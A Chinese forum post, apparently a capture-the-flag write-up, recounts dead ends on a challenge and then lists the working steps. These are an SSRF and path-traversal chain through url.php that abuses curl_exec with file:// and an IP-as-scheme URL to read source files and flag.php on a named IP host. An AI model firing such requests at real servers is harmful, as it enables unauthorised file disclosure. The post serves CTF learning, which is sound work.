-
-
[原创]第四题 飞蛾扑火 踩坑贴
-
发表于: 2022-5-17 13:08
-
第0天,掉dokuwiki坑,文件都上传了,不解析拿不到shell;痛苦
第1天,掉header坑,改了十多种头,组合N个IP都没用;绝望
第2天,掉gopher坑,怎么绕都不行;无奈
结果发现是curl_exec的独特特性,还是知识面浅了,致敬http://cn-sec.com/archives/151034.html:
=====================
- http://121.36.145.157:8044/
- 查看源码
- http://121.36.145.157:8044/phpinfo.php 得到物理路径
- http://121.36.145.157:8044/url.php?url=file://127.0.0.1/../../../../../var/www/html/url.php 得到源码
- http://121.36.145.157:8044/url.php?url=123.57.254.42://127.0.0.1/../flag.php 得到flag
flag{xxx_999()xx*@eeEEE}
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
最后于 2022-5-17 13:09
被VitoYane编辑
,原因:
|
|
|---|---|
